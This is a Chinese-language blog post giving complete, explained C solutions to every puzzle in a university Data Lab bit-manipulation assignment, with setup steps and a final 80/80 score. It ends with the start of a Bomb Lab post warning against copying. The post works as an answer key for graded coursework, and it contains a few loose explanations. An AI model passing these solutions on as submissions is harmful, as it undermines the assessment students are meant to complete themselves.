| 名称 | 描述 | 评分 | 最大操作次数 | | ------------------------ | ------------------------------------ | ---- | ------------ | | bitXnor (x) | 仅使用~和 | 来实现 (x ^ y) | 1 | 7 | | bitConditional (x, y, z) | 对每个比特分别执行 x ? y : z | 1 | 4 | | byteSwap (x, n, m) | 交换第 n 字节和第 m 字节 | 2 | 16 | | logicalShift (x, n) | 向右逻辑移位 x,通过 n 位 | 3 | 16 | | cleanConsecutive1 (x) | 清除 x 的二进制形式中连续的 1 | 4 | 16 | | leftBitCount (x) | 计算 x 的二进制形式中前导的 1 的数量 | 4 | 50 |

补码运算:

| 名称 | 描述 | 评分 | 最大操作次数 | | ------------------- | --------------------------------------------------------- | ---- | ------------ | | counter1To5 (x, n) | 如果 x<5,返回 1+x,否则返回 1 | 2 | 15 | | sameSign (x, y) | 如果 x 和 y 符号相同,返回 1,否则返回 0 | 2 | 5 | | satMul3 (x) | 将 x 乘以 3,如果溢出,上 / 下取到 $T_{min}$ 或 $T_{max}$ | 3 | 25 | | isGreater (x, y) | 如果 x>y,返回 1,否则返回 0 | 3 | 24 | | subOK (x, y) | 确定是否可以计算 x−y 而不溢出 | 3 | 20 | | trueFiveEighths (x) | 将 x 乘以 5/8,避免溢出错误 | 4 | 25 |

浮点运算:

| 名称 | 描述 | 评分 | 最大操作次数 | | ----------------- | --------------------- | ---- | ------------ | | float_half (x) | 计算 x/2 | 4 | 30 | | float_i2f (x) | 将整数 x 转换为浮点数 | 4 | 30 | | float64_f2i (x) | 将双精度 x 转换为整数 | 4 | 20 | | float_negpwr2 (x) | 计算 2 的 (-x) 次幂 | 4 | 20 |

我们的所有代码编写,都是在 bits.c 中进行的。

写前须知

在一切开始之前,请记得先解压 datalab-handout.tar,并进入 datalab-handout 工作目录。

# 解压
tar -xvf datalab-handout.tar
# 进入工作目录
cd datalab-handout
# 编译
make

本 lab 要求在 Linux 环境下完成。Mac 和 Windows 均不适用,你可以考虑使用:

  • WSL2(Windows Subsystem for Linux 2):具体信息请自行搜索
  • Class Machine:由助教团队提供
  • 云服务器:如腾讯云、阿里云等

如果你的服务器是 64 位系统,那么你使用 make 编译的时候,可能会遇到如下错误:

/usr/include/limits.h:26:10: fatal error: bits/libc-header-start.h: No such file or directory
   26 | #include <bits/libc-header-start.h>
      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
make: *** [Makefile:11: btest] Error 1

这是因为你的系统缺少了 gcc-multilib,你可以通过如下命令安装:

# Ubuntu
sudo apt-get install gcc-multilib

代码风格

  • 不允许使用循环、条件语句(除非另有说明,如后续的浮点谜题)
  • 只有如下操作符可以使用:!~&^|+<<>>(除非另有说明)
  • 每个函数都存在一个最大操作次数的限制,大于或等于这个限制数,将会被扣分
  • 禁止使用宏,定义其他函数、调用其他函数
  • 禁止使用形式转换类型
  • 某些函数进一步限制了可以使用的操作符、常量和变量的数量
  • 函数变量一定要声明在函数顶部,不允许在函数中间声明变量

测评

btest:用于测试你的函数是否正确。仅在一个小的测试集上进行测试,不能完全保证你的函数是正确的。

# 编译并运行
make && ./btest
# 对某个函数进行单元测试
make && ./btest -f bitXnor
# 对某个函数进行单元测试,且指定测试用例,以 -1 指定第一个参数,依次类推
make && ./btest -f bitXnor -1 7 -2 0xf

注意,这里的 make 是必需的,每当你修改了 bits.c,都需要重新编译。有关编译的更多知识,你会在第七章学习到。

dlc:用于检查你的代码是否符合规范。

# 检查是否符合编码规范
./dlc bits.c

bdd checker:穷举测试所有可能的输入,完整地检查你的函数是否正确。

# 对某个函数进行单元测试
./bddcheck/check.pl -f bitXnor
# 检查所有函数
./bddcheck/check.pl
# 检查所有函数,且输出总结信息
./bddcheck/check.pl -g

driver.pl:用于评分,检查你的函数是否符合规范且正确。

./driver.pl

辅助工具

要使用辅助工具,你必须先编译:

make

ishow:用于显示整数的二进制形式。

# 显示 -1 的二进制形式
./ishow -1
# Hex = 0xffffffff,       Signed = -1,    Unsigned = 4294967295

# 以 0x 开头,十六进制表示转整数
./ishow 0xffffffff
# Hex = 0xffffffff,       Signed = -1,    Unsigned = 4294967295

fshow:用于显示浮点数的二进制形式。

# 带小数点,浮点数转表示
./fshow 12.0
# Floating point value 12
# Bit Representation 0x41400000, sign = 0, exponent = 0x82, fraction = 0x400000
# Normalized.  +1.5000000000 X 2^(3)

# 不带小数点,表示转浮点数
./fshow 12
# Floating point value 1.681558157e-44
# Bit Representation 0x0000000c, sign = 0, exponent = 0x00, fraction = 0x00000c
# Denormalized.  +0.0000014305 X 2^(-126)

# 不带小数点,以 0x 开头,十六进制表示转浮点数
./fshow 0x41400000
# Floating point value 12
# Bit Representation 0x41400000, sign = 0, exponent = 0x82, fraction = 0x400000
# Normalized.  +1.5000000000 X 2^(3)

bitXnor

  • 要求:仅使用 ~| 来实现 ~(x ^ y)
  • 允许的操作符:~|
  • 最大操作次数:7
  • 评分:1

利用离散数学中学过的德摩根律,我们可以对此式进行变换:

$$ \begin{align*} \because x \text { AND } y &= \sim(\sim x \text{ OR } \sim y) \ \therefore x \text{ XNOR } y &= \sim(x \text{ XOR } y) \ &= (\sim x \text{ AND } \sim y) \text{ OR } (x \text{ AND } y ) \ &= \sim(x \text{ OR } y) \text{ OR } \sim(\sim x \text{ OR } \sim y) \ \end{align*} $$

$$ \text{bitXnor}(x, y) = \sim(x \text{ OR } y) \text{ OR } \sim(\sim x \text{ OR } \sim y) $$

注:XNORXOR 运算的否定。

所以我们得到:

int bitXnor(int x, int y) {
   return ~(x | y) | ~(~x | ~y);
}

bitConditional

  • 要求:对每个比特(位)分别执行 x ? y : z
  • 允许的操作符:~&^|
  • 最大操作次数:4
  • 评分:1

我们利用 x 的每一位,来决定选择 y 还是 z 的一位(也即利用 & 的短路特性):

int bitConditional(int x, int y, int z) {
   // 对每一位,如果 x_i 为 1,那么选择 y_i,否则选择 z_i
   return (x & y) | (~x & z);
}

byteSwap

  • 要求:交换第 n 字节和第 m 字节
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:16
  • 评分:2

想要完成这个谜题,需要我们理解一个叫做 mask(掩码)的概念。

考虑如下真值表:

| x | y | x & y | x | y | | --- | --- | ----- | ------ | | 0 | 0 | 0 | 0 | | 0 | 1 | 0 | 1 | | 1 | 0 | 0 | 1 | | 1 | 1 | 1 | 1 |

我们可以发现,当 x 为 0 时,无论 y 为什么,x & y 都为 0;当 x 为 1 时,无论 y 为什么,x & y 都为 y

基于这个特性,我们可以构造一个 mask,以之对某个数进行 & 运算,从而实现将某些位清零,而保留其他位不变的目的。

考虑到 1 个字节有 8 位,我们可以构造 mask 如下,其实现了对于 x 只保留第 n 个字节,而将其他字节清零的目的:

// n << 3 表示 n * 8
int n_byte_mask = 0xff << (n << 3);
int n_byte = x & n_byte_mask;

我们继续利用这个特性,来实现 byteSwap

int byteSwap(int x, int n, int m) {
   // 首先保存原始x,然后在对应的byte上按位与消去,再按位或上交换后的byte
   int origin = x, clip_mask, swap_mask;
   n <<= 3, m <<= 3;
   // 0xff << n 表示将第 n 个字节保留,其他字节清零
   // 取反后,表示将第 n 个字节清零,其他字节保留
   clip_mask = ~((0xff << n) | (0xff << m));
   x &= clip_mask;
   // 先通过右移 n*8 位,将第 n 个字节移动到第 0 个字节,与 0xff 进行与运算,得到第 n 个字节,再左移 m*8 位,即实现将第 n 个字节移动到第 m 个字节
   swap_mask = (0xff & (origin >> n)) << m | (0xff & (origin >> m)) << n;
   // 完形填空
   x |= swap_mask;
   return x;
}

关于掩码的思想十分重要,我们不仅在后续的谜题中会用到,而且在后续的课程中接触各种各样的位向量时,也会用到。

logicalShift

  • 要求:把 x 逻辑右移 n
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:16
  • 评分:3

逻辑右移,即在右移的过程中,左边补 0。

直接使用 >> 运算符,会导致算术右移,即在右移的过程中,左边补符号位。

所以,我们需要一个 mask,其可以在逻辑右移后,对于负数(即最高位为 1)的情况,将算数右移导致的额外的前导 1 清零。

我们可以通过模拟 Tmin 算数右移 n 位的过程,从而获得这个掩码。

int logicalShift(int x, int n) {
   // 对Tmin(最高位为1)执行同样的右移操作,然后左移一位取反即得所需掩码
   int mask = ~(1 << 31 >> n << 1);
   return x >> n & mask;
}

由于存在对于大常量的使用限制,这里使用 1 << 31 来构造 Tmin,即最高位为 1,其他位为 0 的数。

cleanConsecutive1

  • 要求:清除 x 的二进制形式中连续的 1
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:16
  • 评分:4

最容易想到的方法就是,通过将 x 分别左移、右移 1 位,获得两个 mask,再以这两个 mask 取或构造出一个新的、标志了连续 1 的 consecutive1_mask,对之取反,即得需要保留的位。最后将 x~consecutive1_mask 进行 & 运算,即可实现清除连续 1 的目的。

int cleanConsecutive1(int x) {
   // 左右移动一位成为mask,左侧mask要额外考虑算数右移对最高位的影响
   int right_mask = x << 1;
   int left_mask = x >> 1 & ~(1 << 31);
   x &= ~(right_mask | left_mask);
   return x;
}

另外一种思路十分精巧,通过首先执行 int cur_and_right_mask = x & (x << 1),获得了一个当前位和右侧位都为 1 的掩码,随后执行 cur_and_right_mask | (cur_and_right_mask >> 1),实现了对于连续 1 的掩码。

为了更方便理解,举例如下(注意,i 从低位向高位增长,最低位为第 0 位,tcur_and_right_mask):

  1. $t_i$ = 1 当且仅当 $x_i$ = 1 且 $x_{i-1}$ = 1
  2. 所以 t 标记了 x 中,当前位和右侧位都为 1 的位
  3. 执行 (t | t >> 1),可以在 t 的基础上,将右侧位(即 $x_{i-1}$ )也标记为 1,也即额外标记了 x 中当前位和左侧位都为 1 的位
  4. 由于连续为 1 的位,要么是当前位和右侧位都为 1,要么是当前位和左侧位都为 1,所以执行 x & ~(t | t >> 1),可以将 x 中连续为 1 的位清零
  5. 额外利用 xt 的关系,4 中式子可以进一步化简为 x ^ (t | t >> 1),即 xt | t >> 1 的异或

关于 5,额外解释如下:

  1. 当 $x_i$ = 0 时,$t_i$ = 0,$t_{i+1}$ = 0,所以 $(t | t >> 1)_i$ = 0,$x_i$ 异或 0,结果不变
  2. 当 $x_i$ = 1 时,当且仅当 $t_i$ 和 $t_{i+1}$ 任一为 1 时,$(t | t >> 1)_i$ = 1,$x_i$ 异或 1,即将 $x_i$ 置 0,此时即对应了连续为 1 的位

所以此题的解法如下:

int cleanConsecutive1(int x) {
   int t = x & (x << 1);
   return x & ~(t | t >> 1);
   // 或
   // return x ^ (t | t >> 1);
}

leftBitCount

  • 要求:计算 x 的二进制形式中最高位开始的前导 1 的数量
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:50
  • 评分:4

这题的最大操作次数给的十分慷慨,但这并不代表这题很简单。

这题的主要思路是,利用任何一个数都能被唯一地表示为二进制,也即只能被唯一的拆分为 $\sum_{i=0}^{31} a_i \times 2^i$ 的形式,所以我们可以如下进行判断(伪代码):

int leftBitCount(int x) {
   int ans = 0;
   if (x 最高 16 位均为 1){
      ans += 16;
      x = x << 16;
   }
   if (x 最高 8 位均为 1){
      ans += 8;
      x = x << 8;
   }
   if (x 最高 4 位均为 1){
      ans += 4;
      x = x << 4;
   }
   if (x 最高 2 位均为 1){
      ans += 2;
      x = x << 2;
   }
   if (x 最高 1 位均为 1){
      ans += 1;
      x = x << 1;
   }
   // 对于 32 位全为 1 的情况特判
   if (x == -1){
      ans += 1;
   }
}

接下来,我们需要思考如何使用位运算,实现判断 x 最高 16 位是否均为 1。

这等价于判断 ~x 最高 16 位是否均为 0。

基于此,我们设计实现思路如下:

int tmin = 1 << 31;
int is_high_16_all_1 = !(~(x & (tmin >> 15)) >> 16)

其中,is_high_16_all_1 为 1,当且仅当 ~(x & (tmin >> 15)) 最高 16 位均为 0,也即 x 最高 16 位均为 1。

继续应用这个思路,我们就可以实现 leftBitCount(为了简便起见,各变量命名为 $pt_2^n$):

int leftBitCount(int x) {
   // 采用二分法,注意到返回的ans结果一定可以分解为2的幂次(Power of Two)之和。
   // 所以,每次判断x的高2^n次是否全为1,然后累积相加即可。每次计算完了之后左移相应的位数。
   int tmin = 1 << 31;
   int ans = 0, pt_16, pt_8, pt_4, pt_2, pt_1, is_neg_1;
   pt_16 = (!(~(x & (tmin >> 15)) >> 16)) << 4;
   ans += pt_16;
   x <<= pt_16;
   pt_8 = (!(~(x & (tmin >> 7)) >> 24)) << 3;
   ans += pt_8;
   x <<= pt_8;
   pt_4 = (!(~(x & (tmin >> 3)) >> 28)) << 2;
   ans += pt_4;
   x <<= pt_4;
   pt_2 = (!(~(x & (tmin >> 1)) >> 30)) << 1;
   ans += pt_2;
   x <<= pt_2;
   pt_1 = (!(~(x & tmin) >> 31));
   ans += pt_1;
   x <<= pt_1;
   is_neg_1 = x >> 31 & 1;
   ans += is_neg_1;
   return ans;
}

counter1To5

  • 要求:如果 x<5,返回 1+x,否则返回 1
  • 允许的操作符:~&!|+<<>>
  • 最大操作次数:15
  • 评分:2
  • 题目保证:1 <= x <= 5

首先,我们思考一下如何判断 x 是否等于 5。

我们立刻想到,这可以通过异或运算来实现,即判断 x ^ 5 是否为 0。

然而不幸的是,这道题禁止使用 ^ 异或操作符。那么我们应该如何实现异或运算呢?

我们可以使用位级异或运算

int bitXor(int x, int y) {
   return (~x & y) | (x & ~y);
}

这段代码的核心思想是,其返回的结果 res 的每一位 res_i 为 0,当且仅当:

  • x_i 为 0 的位上,y_i 也必然为 0,这样才能使 ~x_i & y_i 为 0
  • x_i 为 1 的位上,y_i 也必然为 1,这样才能使 x_i & ~y_i 为 0

这也就等价于,res_i 为 0,当且仅当 x_iy_i 相等。

这正是异或运算的定义。

结合这个思路,再额外注意到 1 的二进制形式为 0x00000001,-4 的二进制形式为 0xfffffffc(高 30 位均为 1,低 2 位均为 0),我们可以得到实现如下:

int counter1To5(int x) {
   // 使用异或判断x是否为5,然后根据结果加1或者减4
   int is_equal = !((~x & 5) | (~5 & x));
   return x + !is_equal + ((is_equal << 31 >> 29));
}

这里还有一个技巧就是,如何快速获得 -4 的二进制形式?

我们利用书上讲到的:对于非 Tmin 的补码,均有 -x = ~x + 1,所以我们令 x = 4,即得其二进制表示为 0...0100,对之取反,得 1...1011,再加 1,得 1...1100,即 -4 的二进制表示。

sameSign

  • 要求:如果 xy 符号相同,返回 1,否则返回 0
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:5
  • 评分:2

由于符号位都位于最高位,所以我们只需要对 xy 进行逻辑右移 31 位,再进行 ^ 异或运算,然后使用 ! 运算符,即可实现。

int sameSign(int x, int y) {
   // 逻辑右移31位,然后异或,最后取反
   return !((x >> 31) ^ (y >> 31));
   // 或者
   // return !((x ^ y)>>31);
}

另外一种解法是首先使用 Tmin 作为掩码,取得 xy 各自的符号位:

int sameSign(int x, int y) {
   // 分别计算x和y的符号位,然后异或判断是否相同
   int sign = 1 << 31;
   int x_sign = x & sign;
   int y_sign = y & sign;
   return !(x_sign ^ y_sign);
}

缺点是会多使用一个操作符。

satMul3

  • 要求:将 x 乘以 3,如果溢出,上 / 下取到 $T_{min}$ 或 $T_{max}$
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:25
  • 评分:3

首先,先思考怎么在位级运算中计算出 x * 3

很自然的想法是:

int mul2 = x << 1; // 或者 x + x
int mul3 = mul2 + x;

如果没有发生溢出,那么 xmul2mul3 的符号位应该均相同。所以我们可以通过判断是否满足这个条件,来确定是否发生了溢出。

int is_overflow = (x ^ mul2) >> 31;
is_overflow |= (mul2 ^ mul3) >> 31;

这里进行算数右移 31 位的原因是因为我们希望将 is_overflow 的每一位都搞成相同的 1(对应溢出的情况)或者相同的 0(对应未溢出的情况),从而使之可以作为一个掩码。

再考虑如何在溢出的情况下,根据 x 的符号位,返回 $T_{min}$ 或 $T_{max}$。

  • Tmin 的位级表示:10...0
  • Tmax 的位级表示:01...1

从而我们可以通过如下代码实现此功能:

int x_sign_mask = x >> 31;
int tmin = 1 << 31;
int max_num = x_sign_mask & tmin | ~x_sign_mask & ~tmin;
// 或者
int max_num = ~(x_sign_mask ^ tmin);

最后,我们将这些思路整合起来,即可实现 satMul3

int satMul3(int x) {
   // 利用异或判断符号位是否相同(即是否溢出),并生成溢出标志is_overflow(0xffffffff or 0x0)
   // 然后使用位级条件运算,判断是否需要计算溢出后的值。溢出后的值利用Tmin异或得到。
   int is_overflow, mul_2, mul_3, tmin, x_sign_mask;
   mul_2 = x << 1;
   mul_3 = mul_2 + x;
   is_overflow = (x ^ mul_2) >> 31;
   is_overflow |= (mul_2 ^ mul_3) >> 31;
   tmin = 1 << 31;
   x_sign_mask = x >> 31;
   return (~is_overflow & mul_3) | (is_overflow & ~(x_sign_mask ^ tmin));
}

或者:

int satMul3(int x) {
   int is_overflow, mul_2, mul_3, tmin, tmax, x_sign_mask;
   mul_2 = x << 1;
   mul_3 = mul_2 + x;
   is_overflow = (x ^ mul_2) >> 31;
   is_overflow |= (mul_2 ^ mul_3) >> 31;
   tmin = 1 << 31;
   tmax = ~tmin;
   x_sign_mask = x >> 31;
   return (~is_overflow & mul_3) | (is_overflow & ((x_sign_mask & tmin) | (~x_sign_mask & tmax)));
}

实测这里使用 btest 测试会出现错误结果,但是使用 bdd checker 测试却是正确的,原因不明。

isGreater

  • 要求:如果 x>y,返回 1,否则返回 0
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:24
  • 评分:3

首先,我们根据 xy 的符号位来分类:

xy 异号:那么显然只有 x 为正数,y 为负数的情况下,x>y 成立,这对应 x 的符号位为 0,y 的符号位为 1

xy 同号:此时我们不能直接判断 x - y 的符号位,因为如果 x = y 的话,x - y 的符号位为 0,但是 xy 显然不满足 x>y

我们又想到:

$$ \begin{align*} x > y &\Leftrightarrow x - y > 0 \ &\Leftrightarrow x - y - 1 ≥ 0 \ &\Leftrightarrow x - y - 1 \text{ 的符号位为 0} \end{align*} $$

从而我们可以得到如下代码:

int isGreater(int x, int y) {
   // 若x,y符号不同,则必有x不为负且y为负
   // 若x,y符号相同,则必有x-y-1不为负(规避x=y的情况)
   int x_sign = x >> 31;
   int y_sign = y >> 31;
   int if_not_sign_equal = !!(!x_sign & y_sign);
   // 如果x-y>=0,则x+~y的符号位为0
   int x_minus_y = x + ~y;
   int if_sign_equal = !(x_sign ^ y_sign) & !(x_minus_y >> 31);
   return if_not_sign_equal | if_sign_equal;
}

subOK

  • 要求:如果 x-y 不会溢出,返回 1,否则返回 0
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:20
  • 评分:3

因为 x = y + (x-y),所以 x - y 溢出等价于 y(x-y) 符号均与 x 符号不同。

(考虑课本图 2-26,大正数相加得负数,大负数相加得正数)

再结合有 -y = ~y + 1,我们可以得到如下代码:

int subOK(int x, int y) {
    // 因为x=y+(x-y),所以x-y溢出等价于 y 和 (x-y)符号均与x符号不同
    // (考虑课本上那张图,大正数相加得负数,大负数相加得正数)
    return !(((x ^ y) & (x ^ (x + ~y + 1))) >> 31) & 1;
}

特别地,由于 y = Tmin 的时候不满足 -y = ~y + 1,所以我们需要特别讨论一下:

如果 y = Tmin ,那么 (~y + 1) = y,所以原式等价于 !(((x ^ y) & (x ^ (x + y)) >> 31) & 1

x 为负数时(对应其最高位为 1),由于 y 的最高两位为 10,所以 x + y 的最高位必为 0,于是有原式等于 !((1 ^ 1) & (1 ^ 0)),也就是 1,这是正确的。

x 为正数时(对应其最高位为 0),由于 y 的最高两位为 10,所以 x + y 的最高位必为 1,于是有原式等于 !((0 ^ 1) & (0 ^ 1)),也就是 0,这也是正确的。

trueFiveEighths

  • 要求:计算 $\frac{5}{8}x$,向 0 舍入
  • 允许的操作符:!~&^|+<<>>
  • 最大操作次数:25
  • 评分:4

5x 很好实现,只需要 x << 2 + x 即可。

y/8 也很好实现,只需要 y >> 3 即可,然而回忆书上讲到的,右移实现的是向下舍入而非向 0 舍入,我们必须对此进行修正。

书 P73 曾说到,对于这种情况,我们可以对于负数特判,加上一个偏移量(bias),其等于 $2^k-1$,其中 $k$ 为右移的位数,然后再进行右移,就可以实现向 0 舍入。

基于此,我们可以得到如下代码:

int trueFiveEighths(int x) {
    // 对于低3位(不能整除8的部分)特殊处理,因为他们会造成小数部分的误差,需要向零舍入
    // 利用书上给的向零舍入只需+2^3-1=7的办法,以x的符号位算数右移形成对于是否加7的mask即可
    int integer = x >> 3, fraction = x & 7;
    return integer + (integer << 2) + (fraction + (fraction << 2) + (x >> 31 & 7) >> 3);
}

float_half

  • 要求:计算浮点数 f 的 $\frac{1}{2}f$ 位级等效值,但是如果 f 是 NaN,直接返回 f
  • 参数和结果都作为无符号整数传递,但它们应被解释为单精度浮点值的位级表示
  • 允许的操作符:任何整数 / 无符号整数操作,包括 ||&&,同时允许条件语句和循环语句
  • 最大操作次数:30
  • 评分:4

首先,我们需要回顾一下 IEEE 754 单精度浮点数的表示方法,如下图所示(CS:APP 图 2-32):

IEEE-754

对于单精度浮点数(float),有:

  • 符号位:1 位
  • 指数位:8 位,偏移量为 $2^7-1=127$,对于非规格化数,其指数位全为 0,指数为 $2^{1-bias} = 2^{-126}$,对于规格化数,其指数位不全为 0,指数为 $2^{e-bias}$,其中 $e$ 为指数位的值
  • 尾数位:23 位,对于非规格化数,尾数为 $0.f$,对于规格化数,尾数为 $1.f$

对于双精度浮点数(double),有:

  • 符号位:1 位
  • 指数位:11 位,偏移量为 $2^{10}-1=1023$,对于非规格化数,其指数位全为 0,指数为 $2^{1-bias} = 2^{-1022}$,对于规格化数,其指数位不全为 0,指数为 $2^{e-bias}$,其中 $e$ 为指数位的值
  • 尾数位:52 位,对于非规格化数,尾数为 $0.f$,对于规格化数,尾数为 $1.f$

复习完了,让我们重新回到题目。要计算 $\frac{1}{2}f$,一个很朴素的想法就是直接对指数位进行减 1 操作即可。

然而,若以此法实现,我们还需要对以下几种情况进行特判:

  • f 为非规格化数时,其指数位全为 0,显然不能减 1,但此时我们只需要将尾数位右移 1 位即可
  • f 的指数位恰为 1 时,减 1 后会变成非规格化数,此时我们可以通过直接对指数位和尾数位整体进行右移 1 位的操作来弥补非规格化数的尾数位不加 1 的问题,然而同时带来了一个最低位是否要舍入的问题,需要我们进一步特判
  • f 为 NaN 时,我们需要直接返回 f

所以,我们可以得到如下代码:

unsigned float_half(unsigned uf) {
   // 设置掩码提取各个部分的值,要额外注意浮点数运算存在舍入。
   int sign_mask = 0x80000000, exp_mask = 0x7f800000, frac_mask = 0x7fffff;
   int sign = uf & (sign_mask), exp = uf & exp_mask, frac = uf & frac_mask, round = !((uf & 3) ^ 3);
   if (!exp)
      return sign | ((frac >> 1) + round);
   if (exp == exp_mask) // Inf或者NaN
      return uf;
   if ((exp >> 23) == 1) // 如果Exp=1,那么右移一位后指数位变为0,同时弥补了非规格化数尾数不加 1 的问题,但是还需要额外判断是否需要舍入
      return sign | (((exp | frac) >> 1) + round);
   // 其他情况,直接在exp上减1即可
   return sign | (((exp >> 23) - 1) << 23 & exp_mask) | frac;
}

(回忆一下,浮点数的舍入方式是,四舍六入五成双,也即当最低位为 0 时,直接舍去,当最低位为 1 时,且次低位也为 1 时,才会需要进位)

float_i2f

  • 要求:将整数 x 转换为浮点数
  • 参数和结果都作为无符号整数传递,但它们应被解释为单精度浮点值的位级表示
  • 允许的操作符:任何整数 / 无符号整数操作,包括 ||&&,同时允许条件语句和循环语句
  • 最大操作次数:30
  • 评分:4

我们知道,其实 intfloat 都是基于二进制的表示方法,这给于了我们基于位操作实现此函数的基础。

同时我们也知道,一个 int 有 32 位,其中有 31 位可以用以表示精度,而 float 的尾数位有 23 位,所以我们需要将 int 的精度位右移 8 位(即损失 8 位精度),从而得到 float 的尾数位。同时,我们还需要根据 “四舍六入五成双” 的原则,对于最低位是否要舍入进行判断。

于是,我们可以得到如下代码:

unsigned float_i2f(int x) {
   unsigned sign = x >> 31 & 1, exp, frac, round;
   int x_exp, frac_mask;
   if (!x) // x=0,会在求x最高非零位时出错,所以特判
      return 0;
   if (!(x ^ (1 << 31))) // x=TMin,会在下一步对x取反过程中出错,所以特判
      return 0xcf << 24;
   if (sign)
      x = -x;
   // x_exp 代表 x 的最高非零位的位置,也即 x 的精度位的最高位的位置
   x_exp = 31;
   while (!(x >> x_exp))
      x_exp--;
   exp = x_exp + 0x7f; // exp+bias
   x <<= (31 - x_exp); // 得到小数部分
   frac_mask = 0x7fffff;
   // 右移 8 位,使得尾数位对齐
   frac = (x >> 8) & frac_mask;
   round = x & 0xff; // 得到要被舍入的小数部分
   frac += ((round > 0x80) || ((round == 0x80) && (frac & 1))); // 等价于判断是否大于128,或者等于128且最低位为1,即向偶数舍入
   // 对于舍入后进位的情况,因为最高位从23变为24,所以要且上一个掩码,而且增加一位阶码
   if (frac >> 23) {
      frac &= frac_mask;
      exp += 1;
   }
   return sign << 31 | exp << 23 | frac;
}

float64_f2i

  • 要求:将浮点数 f 转换为整数
  • 参数作为无符号整数传递,但它应被解释为双精度浮点值的位级表示,且第一个参数表示的是低 32 位,第二个参数表示的是高 32 位
  • 如果 f 不能用整数表示(例如超出表示范围、或者是 NaN),返回 0x80000000
  • 允许的操作符:任何整数 / 无符号整数操作,包括 ||&&,同时允许条件语句和循环语句
  • 最大操作次数:20
  • 评分:4

回忆之前提到的,对于双精度浮点数(double),有:

  • 符号位:1 位
  • 指数位:11 位,偏移量为 $2^{10}-1=1023$,对于非规格化数,其指数位全为 0,指数为 $2^{1-bias} = 2^{-1022}$,对于规格化数,其指数位不全为 0,指数为 $2^{e-bias}$,其中 $e$ 为指数位的值
  • 尾数位:52 位,对于非规格化数,尾数为 $0.f$,对于规格化数,尾数为 $1.f$

从而我们知道,一个 double 有 52 位精度,而 int 只有 31 位精度,这不可避免的会导致精度损失。

同时,一个 int 最多只有 31 位精度,也代表了其表示范围不超过 -2^31 ~ 2^31-1,这是我们得以判断是否发生了溢出的基础。

我们还注意到,对于 double 中,指数位小于等于偏移量 1023 的数,其指数必为 2 的负幂次(特别地,对于 ±0,有除符号位外全为 0 的表示方式),这些数在转换为 int 时,必然会舍入到 0。

所以,我们可以得到如下代码:

int float64_f2i(unsigned uf1, unsigned uf2) {
    unsigned sign = (uf2 >> 31);
    int exp_mask = 0x7ff;
    int exp = ((uf2 >> 20) & exp_mask) - 1023;
    unsigned frac = ((uf2 & 0xfffff) << 11) | (((uf1 >> 21) & exp_mask)) | (0x80000000); // uf2的低20位+uf1的高11位
    if (exp < 0)
        return 0;
    if (exp >= 31)
        return 0x80000000;
    frac = (frac >> (31 - exp)) & ~(0x80000000 >> (31 - exp) << 1); // 避免算数右移导致的前导 1
    if (sign)
        return -frac;
    return frac;
}

float_negpwr2

  • 要求:计算 $2.0^{-x}$ 的浮点表示
  • 如果得到的结果太小以至于是一个非规格化数,返回 0;如果得到的结果太大以至于无法表示成浮点数,返回 $+\infin$
  • 参数和结果都作为无符号整数传递,但它们应被解释为单精度浮点值的位级表示
  • 允许的操作符:任何整数 / 无符号整数操作,包括 ||&&,同时允许条件语句和循环语句
  • 最大操作次数:20
  • 评分:4

首先思考那些数可以被表示为浮点数。

我们知道,对于单精度浮点数(float),其指数位的偏移量为 $2^7-1=127$,指数位的范围为 $[0, 255]$,对应的指数范围为 $[-126, 128]$。其中,指数位为 0 的数为非规格化数,指数位为 255 的数为 NaN 或者 Inf,其他数为规格化数。

最小的非规格化数的位级表示为 0x00000001,对应的指数位为 0,尾数为 $2^{-23}$,所以最小的非规格化数为 $2^{-126} \times 2^{-23} = 2^{-149}$。

所以任何满足 $-x \lt -149$ ,也即 $x \gt 149$ 的数,都需要舍入为 0。

而最大的规格化数的位级表示为 0x7f7fffff,对应的指数为 254,尾数为 $2-2^{-23}$,所以最大的规格化数为 $2^{127} \times (2-2^{-23}) = 2^{128} - 2^{104}$。

再往上,就需要指数位全为 1,这时候就是 Inf 了。

也即,对于任何满足 $-x \geq 128$ ,也即 $x \leq -128$ 的数,都需要舍入为 Inf。

所以,我们可以得到如下代码:

unsigned float_negpwr2(int x) {
    // 不对x先做到阶码位的转换,因为可能会造成溢出,而是直接判断x的范围,然后返回对应的值
    // -x < -149=1-127-23,即最小的非规格化数
    if (x > 149)
        return 0;
    // -x >= 128=255-127,即最大的阶码
    if (x <= -128)
        return 0x7f800000;
    // -x > -127,即规格化数,此时小数全为0,阶码为-x+127
    if (x < 127)
        return (-x + 127) << 23;
    // -x 介于 -127 和 -149 之间,即非规格化数,阶码位全为0
    return 1 << (149 - x);
}

本地评分

运行:

make && ./driver.pl

得到下列分数:

Correctness Results     Perf Results
Points  Rating  Errors  Points  Ops     Puzzle
1       1       0       2       7       bitXnor
1       1       0       2       4       bitConditional
2       2       0       2       15      byteSwap
3       3       0       2       6       logicalShift
4       4       0       2       8       cleanConsecutive1
4       4       0       2       42      leftBitCount
2       2       0       2       11      counter1To5
2       2       0       2       5       sameSign
3       3       0       2       15      satMul3
3       3       0       2       14      isGreater
3       3       0       2       9       subOK
4       4       0       2       11      trueFiveEighths
4       4       0       2       23      float_half
4       4       0       2       30      float_i2f
4       4       0       2       20      float64_f2i
4       4       0       2       9       float_negpwr2

Score = 80/80 [48/48 Corr + 32/32 Perf] (229 total operators)

至此,我们就完成了 Data Lab 的所有题目,Congratulations!

参考资料

💾

更适合北大宝宝体质的 Bomb Lab 踩坑记

2024年1月13日 01:46

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

写在前面:我写本篇博文的目的是为了帮助同学们更好的完成 lab,而不是完全的直接帮你把 lab 写完,且不说每个人的炸弹都不一样,如果你完全的照搬我的方法,而不去思考每条汇编指令的意义,去学习它们,那么你一定会在考试中吃大亏。

